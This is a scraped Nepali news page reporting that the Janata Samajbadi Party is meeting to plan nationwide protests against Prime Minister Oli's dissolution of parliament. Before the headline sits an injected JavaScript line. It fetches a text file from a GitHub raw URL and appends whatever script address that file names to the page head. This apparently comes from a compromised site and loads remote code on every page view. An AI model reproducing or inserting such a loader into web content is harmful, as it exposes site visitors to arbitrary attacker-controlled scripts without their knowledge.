;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); जसपाको केन्द्रीय कार्यकारिणी समितिको बैठक आज : भोली ओली बिरुद्ध देश ब्यापी पर्दशन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • जसपाको केन्द्रीय कार्यकारिणी समितिको बैठक आज : भोली ओली बिरुद्ध देश ब्यापी पर्दशन
देश/प्रदेश

जसपाको केन्द्रीय कार्यकारिणी समितिको बैठक आज : भोली ओली बिरुद्ध देश ब्यापी पर्दशन

पुष ०७,

काठमाडौं । जनता समाजवादी पार्टी (जसपा) को आज केन्द्रीय कार्यकारिणी समितिको बैठक बोठक बोलाइएको छ ।

जसपाका संघीय परिषद् अद्यक्ष डा. बाबुराम भट्टराईले प्रधानमन्त्री केपी शर्मा ओलीले संसद विघटन गर्नु  असंवैधानिक/अलोकतान्त्रिक/प्रतिगमनकारी हर्कत भएको ठहर गर्दै भोली बुधबार देश ब्यापी पर्दशन गर्ने तयारी गर्ने थप छलफल गर्नको लागि बैठक डाकेको बताए ।आजकै बठैकमा थप संघर्षका कार्यक्रम र भावी रणनीति तय गर्न बैठक बस्न लागेको हो ।

जसपाले सबै जिल्ला सदरमुकामहरूमा विरोध प्रदर्शन गर्ने निर्णय गरिसकेको ।

फेसबुक प्रतिक्रियाहरु